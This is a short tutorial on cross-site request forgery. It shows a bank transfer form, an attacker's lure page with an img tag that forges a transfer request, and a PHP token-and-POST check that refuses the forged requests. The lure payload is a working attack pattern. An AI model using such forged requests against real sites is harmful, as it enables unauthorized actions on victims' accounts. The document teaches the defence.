Cross Site Request Forgery
Victim has an account at http://bank.com/ and loves the site because of its "remember me" technology.
Attacker creates an account and reverse engineers the "Transfer Funds" page.
<form action="transfer.php">
  Transfer To: <input type="text" name="to" />
  Amount: <input type="text" name="amt" />
</form>
Attacker lures Victim to visit his site.
<html>
  Naked pictures of Celebrities here.
  <img src="http://bank.com/transfer.php?to=66666&amt=1000000" />
</html>
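From the server's side, this looks like a legitimate request from the client: Victim's browser sends it to bank.com along with the "remember me" cookie, just as it would for a request Victim made on purpose.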
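
A server-side check that rejects the forged request above, as an added example that is not part of the original page. The function names, the csrf_token field and the integer-only validation of to/amt are assumptions made for illustration.

```php
<?php
// Added example: request check for a transfer endpoint (synchronizer token pattern).
// issue_token(), handle_transfer() and 'csrf_token' are hypothetical names.

// Issue one random token per session; the real form would carry it in a hidden field.
function issue_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Decide whether a transfer request may proceed. Returns [status, message].
function handle_transfer(string $method, array $params, array $session): array {
    // State-changing actions must not be reachable by GET, which is what <img src> sends.
    if ($method !== 'POST') {
        return [405, 'transfer requires POST'];
    }
    // The cookie alone proves nothing: the request must also carry the session's token.
    $expected = $session['csrf_token'] ?? '';
    $supplied = $params['csrf_token'] ?? '';
    if ($expected === '' || !is_string($supplied) || !hash_equals($expected, $supplied)) {
        return [403, 'missing or invalid CSRF token'];
    }
    // Assumption: account number and amount are positive integers.
    $opts = ['options' => ['min_range' => 1]];
    $to   = filter_var($params['to']  ?? null, FILTER_VALIDATE_INT, $opts);
    $amt  = filter_var($params['amt'] ?? null, FILTER_VALIDATE_INT, $opts);
    if ($to === false || $amt === false) {
        return [400, 'invalid to/amt'];
    }
    return [200, "transfer of $amt to $to accepted"];
}

// Constructed sample requests (not captured traffic).
$session = ['user' => 'victim'];   // already logged in via "remember me"
$token   = issue_token($session);

$cases = [
    'img tag GET from the lure page' => ['GET',  ['to' => '66666', 'amt' => '1000000']],
    'cross-site POST without token'  => ['POST', ['to' => '66666', 'amt' => '1000000']],
    'form POST from bank.com'        => ['POST', ['to' => '12345', 'amt' => '50', 'csrf_token' => $token]],
];
foreach ($cases as $label => [$method, $params]) {
    [$status, $msg] = handle_transfer($method, $params, $session);
    printf("%-32s -> %d %s\n", $label, $status, $msg);
}
```

Run from the command line with php; the first two requests are refused with 405 and 403, and only the request carrying the session's token is accepted.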